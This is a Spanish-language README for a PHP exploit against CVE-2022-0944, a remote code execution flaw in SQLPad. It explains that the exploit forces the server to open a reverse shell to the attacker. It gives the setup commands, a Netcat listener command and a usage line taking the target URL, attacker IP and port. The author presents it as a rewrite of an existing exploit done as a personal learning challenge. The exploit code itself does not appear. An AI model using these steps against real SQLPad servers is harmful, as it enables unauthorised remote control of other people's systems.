
CVE-2022-0944 Exploit de ejecución remota de código
Este código PHP está diseñado para explotar una vulnerabilidad de Ejecución Remota de Código (RCE) en SQLPad, relacionada con CVE-2022-0944.
Funciona inyectando código malicioso en la aplicación SQLPad, forzándola a ejecutar un comando del sistema que abre una reverse shell – una conexión que otorga al atacante control remoto del sistema vulnerable.
sudo apt-get install php-clisudo apt-get install php-curlPara capturar la conexión reverse shell, inicie Netcat en la máquina del atacante:
nc -lvnp 4444
php exploit.php <root_url> <attacker_ip> <attacker_port>
<root_url>: La URL raíz de la SQLPad vulnerable (p.ej., http://target.com:3000)
<attacker_ip>: La dirección IP del atacante que escucha la conexión reverse shell (misma que la IP de Netcat)
<attacker_port>: El puerto en el que el atacante está escuchando (mismo que el puerto de Netcat)
La lógica original del exploit se basó en este repositorio:
🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944
Mi objetivo aquí fue entender la lógica del exploit y reescribirlo en otro lenguaje de programación como un desafío personal.
Referencia adicional: 🔗 CVE-2022-0944 – NVD